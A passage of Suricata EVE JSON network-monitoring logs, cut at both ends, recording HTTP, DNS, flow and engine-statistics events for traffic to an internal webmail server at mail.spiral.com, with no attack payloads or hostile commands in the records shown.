Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":386},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/data.png","state":"CLOSED","stored":false,"size":386,"tx_id":2}} {"timestamp":"2020-02-29T00:03:14.339998+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":13}} {"timestamp":"2020-02-29T00:03:16.000265+0000","event_type":"stats","stats":{"uptime":13848,"capture":{"kernel_packets":132906,"kernel_drops":0},"decoder":{"pkts":132909,"bytes":92153610,"invalid":180,"ipv4":131476,"ipv6":8,"ethernet":132909,"raw":0,"null":0,"sll":0,"tcp":126450,"udp":4832,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099360},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2682,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2698,"synack":2689,"rst":1194,"segment_memcap_drop":0,"stream_dep
th_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1727,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2202,"failed_udp":108},"tx":{"http":4490,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2279}},"flow_mgr":{"closed_pruned":2654,"new_pruned":15,"est_pruned":2245,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21823,"memcap_state":0,"memcap_global":0},"http":{"memuse":47133,"memcap":0}}} {"timestamp":"2020-02-29T00:03:17.000187+0000","flow_id":148780504013802,"event_type":"flow","src_ip":"192.168.10.122","src_port":56194,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:15.941034+0000","end":"2020-02-28T23:58:16.052379+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:20.456707+0000","flow_id":97464254789635,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35466,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16659,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:20.562100+0000","flow_id":97464254789635,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35466,"proto":"UDP","dns":{"type":"answer","id":16659,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:03:20.562100+0000","flow_id":97464254789635,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35466,"proto":"UDP","dns":{"type":"answer","id":16659,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:20.685840+0000","flow_id":1755149832342807,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34718,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:03:20.701894+0000","flow_id":1755149832342807,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34718,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5267}} 
{"timestamp":"2020-02-29T00:03:21.000204+0000","flow_id":1408258204220712,"event_type":"flow","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":20,"pkts_toclient":20,"bytes_toserver":5143,"bytes_toclient":14597,"start":"2020-02-29T00:02:11.900392+0000","end":"2020-02-29T00:02:20.574550+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:21.000418+0000","flow_id":872675782682226,"event_type":"flow","src_ip":"192.168.10.81","src_port":52658,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":843,"bytes_toclient":1539,"start":"2020-02-29T00:02:15.452210+0000","end":"2020-02-29T00:02:20.466510+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:21.000519+0000","flow_id":1477475882025965,"event_type":"flow","src_ip":"192.168.10.122","src_port":45481,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:20.115693+0000","end":"2020-02-28T23:58:20.227236+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:03:21.000682+0000","flow_id":246860392947698,"event_type":"flow","src_ip":"192.168.10.81","src_port":52656,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":11,"bytes_toserver":2743,"bytes_toclient":7902,"start":"2020-02-29T00:02:15.450546+0000","end":"2020-02-29T00:02:20.574521+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:23.000217+0000","event_type":"stats","stats":{"uptime":13855,"capture":{"kernel_packets":132918,"kernel_drops":0},"decoder":{"pkts":132932,"bytes":92161692,"invalid":180,"ipv4":131499,"ipv6":8,"ethernet":132932,"raw":0,"null":0,"sll":0,"tcp":126471,"udp":4834,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10004,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2683,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2699,"synack":2690,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1728,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2203,"failed_udp":108},"tx":{"http":4491,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2280}},"flow_mgr":{"closed_pruned":2657,"new_pruned":15,"est_pruned":2247,"bypas
sed_pruned":0,"flows_checked":6,"flows_notimeout":2,"flows_timeout":4,"flows_timeout_inuse":0,"flows_removed":4,"rows_checked":65536,"rows_skipped":65530,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21492,"memcap_state":0,"memcap_global":0},"http":{"memuse":102937,"memcap":0}}} {"timestamp":"2020-02-29T00:03:25.000544+0000","flow_id":359534564994154,"event_type":"flow","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":21,"bytes_toserver":4143,"bytes_toclient":20807,"start":"2020-02-29T00:02:15.453738+0000","end":"2020-02-29T00:02:24.404757+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:25.702845+0000","flow_id":1755149832342807,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34718,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5267},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21565,"tx_id":0}} 
{"timestamp":"2020-02-29T00:03:29.000556+0000","flow_id":2170112373483042,"event_type":"flow","src_ip":"192.168.10.122","src_port":56279,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:28.583202+0000","end":"2020-02-28T23:58:28.694600+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:30.000154+0000","event_type":"stats","stats":{"uptime":13862,"capture":{"kernel_packets":132932,"kernel_drops":0},"decoder":{"pkts":132935,"bytes":92161890,"invalid":180,"ipv4":131502,"ipv6":8,"ethernet":132935,"raw":0,"null":0,"sll":0,"tcp":126474,"udp":4834,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2683,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2699,"synack":2690,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1728,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2203,"failed_udp":108},"tx":{"http":4491,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2280}},"flow_mgr":{"closed_pruned":2658,"new_pruned":15,"est_pruned":2247,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked"
:65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21161,"memcap_state":0,"memcap_global":0},"http":{"memuse":46893,"memcap":0}}} {"timestamp":"2020-02-29T00:03:30.001254+0000","flow_id":1530510154133066,"event_type":"flow","src_ip":"192.168.10.130","src_port":34700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":9,"bytes_toserver":1030,"bytes_toclient":7104,"start":"2020-02-29T00:02:23.847434+0000","end":"2020-02-29T00:02:29.118708+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:32.247963+0000","flow_id":282835044059291,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46479,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":36024,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:32.359559+0000","flow_id":282835044059291,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46479,"proto":"UDP","dns":{"type":"answer","id":36024,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:32.359559+0000","flow_id":282835044059291,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46479,"proto":"UDP","dns":{"type":"answer","id":36024,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:32.520894+0000","flow_id":686372991301585,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; 
Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:03:32.537272+0000","flow_id":686372991301585,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5269}} {"timestamp":"2020-02-29T00:03:33.000689+0000","flow_id":950942972546480,"event_type":"flow","src_ip":"192.168.10.81","src_port":52662,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":314,"bytes_toclient":817,"start":"2020-02-29T00:02:28.560560+0000","end":"2020-02-29T00:02:28.994268+0000","age":0,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"17","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:03:34.000485+0000","flow_id":1466343343045982,"event_type":"flow","src_ip":"192.168.10.81","src_port":52666,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":2,"bytes_toserver":272,"bytes_toclient":140,"start":"2020-02-29T00:02:28.572766+0000","end":"2020-02-29T00:02:33.574149+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:34.000756+0000","flow_id":1520949557243714,"event_type":"flow","src_ip":"192.168.10.81","src_port":52664,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1395,"bytes_toclient":2845,"start":"2020-02-29T00:02:28.569154+0000","end":"2020-02-29T00:02:33.575181+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:03:37.000214+0000","event_type":"stats","stats":{"uptime":13869,"capture":{"kernel_packets":132938,"kernel_drops":0},"decoder":{"pkts":132952,"bytes":92169556,"invalid":180,"ipv4":131519,"ipv6":8,"ethernet":132952,"raw":0,"null":0,"sll":0,"tcp":126489,"udp":4836,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2684,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2700,"synack":2691,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1729,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2204,"failed_udp":108},"tx":{"http":4492,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2281}},"flow_mgr":{"closed_pruned":2662,"new_pruned":15,"est_pruned":2248,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":2,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21492,"memcap_state":0,"memcap_global":0},"http":{"memuse":102755,"memcap":0}}} 
{"timestamp":"2020-02-29T00:03:37.538019+0000","flow_id":686372991301585,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34720,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5269},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21565,"tx_id":0}} {"timestamp":"2020-02-29T00:03:39.000249+0000","flow_id":432102333557313,"event_type":"flow","src_ip":"192.168.10.130","src_port":34702,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1101,"bytes_toclient":4128,"start":"2020-02-29T00:02:33.535105+0000","end":"2020-02-29T00:02:38.758339+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:40.000465+0000","flow_id":484492329315239,"event_type":"flow","src_ip":"192.168.10.122","src_port":51089,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:39.486311+0000","end":"2020-02-28T23:58:39.597883+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:03:42.000363+0000","flow_id":1857713646178395,"event_type":"flow","src_ip":"192.168.10.130","src_port":34698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":23,"bytes_toserver":3176,"bytes_toclient":19569,"start":"2020-02-29T00:02:01.561243+0000","end":"2020-02-29T00:02:41.127250+0000","age":40,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:42.001453+0000","flow_id":273776938932889,"event_type":"flow","src_ip":"192.168.10.122","src_port":42956,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:58:41.744089+0000","end":"2020-02-28T23:58:41.855799+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:03:44.000397+0000","event_type":"stats","stats":{"uptime":13876,"capture":{"kernel_packets":132957,"kernel_drops":0},"decoder":{"pkts":132959,"bytes":92170018,"invalid":180,"ipv4":131526,"ipv6":8,"ethernet":132959,"raw":0,"null":0,"sll":0,"tcp":126496,"udp":4836,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2684,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2700,"synack":2691,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1729,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2204,"failed_udp":108},"tx":{"http":4492,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2281}},"flow_mgr":{"closed_pruned":2663,"new_pruned":15,"est_pruned":2249,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20831,"memcap_state":0,"memcap_global":0},"http":{"memuse":45335,"memcap":0}}} 
{"timestamp":"2020-02-29T00:03:45.000693+0000","flow_id":667500901523119,"event_type":"flow","src_ip":"192.168.10.130","src_port":34704,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1130,"bytes_toclient":5052,"start":"2020-02-29T00:02:39.024239+0000","end":"2020-02-29T00:02:44.205454+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:47.000253+0000","flow_id":795211738668950,"event_type":"flow","src_ip":"192.168.10.122","src_port":48627,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:44.941974+0000","end":"2020-02-28T23:58:45.053386+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:47.001136+0000","flow_id":139224203776181,"event_type":"flow","src_ip":"192.168.10.122","src_port":55264,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:45.118965+0000","end":"2020-02-28T23:58:45.230467+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:03:47.001351+0000","flow_id":612061463836783,"event_type":"flow","src_ip":"192.168.10.130","src_port":34706,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":10,"bytes_toserver":1161,"bytes_toclient":7936,"start":"2020-02-29T00:02:41.129135+0000","end":"2020-02-29T00:02:46.724343+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:47.425157+0000","flow_id":106092845825221,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45285,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":29425,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:47.531143+0000","flow_id":106092845825221,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45285,"proto":"UDP","dns":{"type":"answer","id":29425,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:47.531143+0000","flow_id":106092845825221,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45285,"proto":"UDP","dns":{"type":"answer","id":29425,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:47.578774+0000","flow_id":1754728927280743,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
